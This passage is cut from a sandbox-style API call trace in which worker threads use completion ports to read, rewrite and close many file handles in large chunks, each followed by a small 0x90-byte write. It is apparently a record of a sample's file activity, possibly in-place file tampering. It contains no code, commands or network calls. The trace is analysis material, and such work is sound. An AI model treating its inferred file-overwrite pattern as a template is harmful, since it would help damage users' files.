lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.854] CloseHandle (hObject=0x134) returned 1 [0156.855] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4790020) returned 1 [0156.856] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.856] CloseHandle (hObject=0x2e0) returned 1 [0156.856] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x48b0020) returned 1 [0156.857] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.857] CloseHandle (hObject=0x640) returned 1 [0156.862] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x49d0020) returned 1 [0156.862] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.862] CloseHandle (hObject=0x644) returned 1 [0156.863] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4af0020) returned 1 [0156.863] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.863] CloseHandle (hObject=0x670) returned 1 [0156.865] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4c10020) returned 1 [0156.866] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.897] ReadFile (in: hFile=0x644, lpBuffer=0x2880124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x2880020 | out: lpBuffer=0x2880124*, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x2880020) returned 1 [0157.112] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0157.114] ReadFile (in: hFile=0x65c, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x2f30020) returned 1 [0157.130] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0157.130] ReadFile (in: hFile=0x2e0, lpBuffer=0x4280124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124*, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x4280020) returned 1 [0157.131] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0157.131] WriteFile (in: hFile=0x644, lpBuffer=0x2880124*, nNumberOfBytesToWrite=0x11e61, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x2880020 | out: lpBuffer=0x2880124*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x2880020) returned 1 [0157.131] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0157.132] WriteFile (in: hFile=0x65c, lpBuffer=0x2f30124*, nNumberOfBytesToWrite=0x17660, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x2f30020) returned 1 [0157.132] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0157.132] WriteFile (in: hFile=0x2e0, lpBuffer=0x4280124*, nNumberOfBytesToWrite=0x15080, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4280020) returned 1 [0157.133] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0157.133] ReadFile (in: hFile=0x644, lpBuffer=0x2880124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x2880020 | out: lpBuffer=0x2880124, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x2880020) returned 0x0 [0157.133] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0157.133] ReadFile (in: hFile=0x65c, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x2f30020) returned 0x0 [0157.133] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0157.133] ReadFile (in: hFile=0x2e0, lpBuffer=0x4280124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x4280020) returned 0x0 [0157.133] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 0 [0157.133] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2880020) returned 1 [0157.133] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 0 [0157.133] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0157.133] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 0 [0157.133] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4280020) returned 1 [0157.133] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0157.133] WriteFile (in: hFile=0x644, lpBuffer=0x2880094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x2880020 | out: lpBuffer=0x2880094*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x2880020) returned 1 [0157.133] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0157.134] WriteFile (in: hFile=0x65c, lpBuffer=0x2f30094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30094*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x2f30020) returned 1 [0157.134] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0157.134] WriteFile (in: hFile=0x2e0, lpBuffer=0x4280094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4280020 | out: lpBuffer=0x4280094*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4280020) returned 1 [0157.134] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0157.134] CloseHandle (hObject=0x644) returned 1 [0157.135] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2880020) returned 1 [0157.136] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0157.136] CloseHandle (hObject=0x65c) returned 1 [0157.137] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2f30020) returned 1 [0157.137] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0157.137] CloseHandle (hObject=0x2e0) returned 1 [0157.138] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4280020) returned 1 [0157.139] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 Thread: id = 127 os_tid = 0x6d8 [0136.131] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0147.713] WriteFile (in: hFile=0x618, lpBuffer=0x48b0124*, nNumberOfBytesToWrite=0x18407, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x48b0020 | out: lpBuffer=0x48b0124*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x48b0020) returned 1 [0147.721] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0147.723] ReadFile (in: hFile=0x618, lpBuffer=0x48b0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x48b0020 | out: lpBuffer=0x48b0124, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x48b0020) returned 0x0 [0147.723] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 0 [0147.725] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4af0020) returned 1 [0147.725] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0147.726] WriteFile (in: hFile=0x640, lpBuffer=0x49d0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x49d0020 | out: lpBuffer=0x49d0094*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x49d0020) returned 1 [0147.738] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0147.738] CloseHandle (hObject=0x618) returned 1 [0147.750] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x48b0020) returned 1 [0147.750] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0148.010] WriteFile (in: hFile=0x640, lpBuffer=0x49d0124*, nNumberOfBytesToWrite=0x157a4, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x49d0020 | out: lpBuffer=0x49d0124*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x49d0020) returned 1 [0148.018] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0148.018] ReadFile (in: hFile=0x624, lpBuffer=0x48b0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x48b0020 | out: lpBuffer=0x48b0124, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x48b0020) returned 0x0 [0148.018] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0148.018] ReadFile (in: hFile=0x640, lpBuffer=0x49d0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x49d0020 | out: lpBuffer=0x49d0124, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x49d0020) returned 0x0 [0148.018] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 0 [0148.018] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x48b0020) returned 1 [0148.018] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 0 [0148.018] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x49d0020) returned 1 [0148.018] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0148.018] WriteFile (in: hFile=0x624, lpBuffer=0x48b0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x48b0020 | out: lpBuffer=0x48b0094*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x48b0020) returned 1 [0148.027] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0148.027] CloseHandle (hObject=0x654) returned 1 [0148.059] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4790020) returned 1 [0148.060] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0148.060] WriteFile (in: hFile=0x654, lpBuffer=0x4af0124*, nNumberOfBytesToWrite=0x18e31, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4af0020 | out: lpBuffer=0x4af0124*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4af0020) returned 1 [0148.068] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0148.069] ReadFile (in: hFile=0x654, lpBuffer=0x4af0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x4af0020 | out: lpBuffer=0x4af0124, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x4af0020) returned 0x0 [0148.069] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 0 [0148.069] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4af0020) returned 1 [0148.069] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0148.069] WriteFile (in: hFile=0x654, lpBuffer=0x4af0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4af0020 | out: lpBuffer=0x4af0094*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4af0020) returned 1 [0148.086] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0148.097] CloseHandle (hObject=0x654) returned 1 [0148.120] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4af0020) returned 1 [0148.135] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0148.135] WriteFile (in: hFile=0x660, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0xc712, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x41f0020) returned 1 [0148.141] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0148.141] ReadFile (in: hFile=0x660, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x41f0020) returned 0x0 [0148.141] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 0 [0148.141] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x41f0020) returned 1 [0148.141] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0148.141] WriteFile (in: hFile=0x660, lpBuffer=0x41f0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0094*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x41f0020) returned 1 [0148.157] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0148.157] ReadFile (in: hFile=0x618, lpBuffer=0x4670124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124*, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x4670020) returned 1 [0148.158] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0148.158] CloseHandle (hObject=0x660) returned 1 [0148.163] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x41f0020) returned 1 [0148.164] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0148.717] CloseHandle (hObject=0x368) returned 1 [0148.735] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x5090020) returned 1 [0148.736] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0148.736] ReadFile (in: hFile=0x368, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x2f30020) returned 1 [0148.736] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0148.737] WriteFile (in: hFile=0x368, lpBuffer=0x2f30124*, nNumberOfBytesToWrite=0x1491e, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x2f30020) returned 1 [0148.738] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0148.738] ReadFile (in: hFile=0x368, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x2f30020) returned 0x0 [0148.738] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 0 [0148.738] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0148.738] 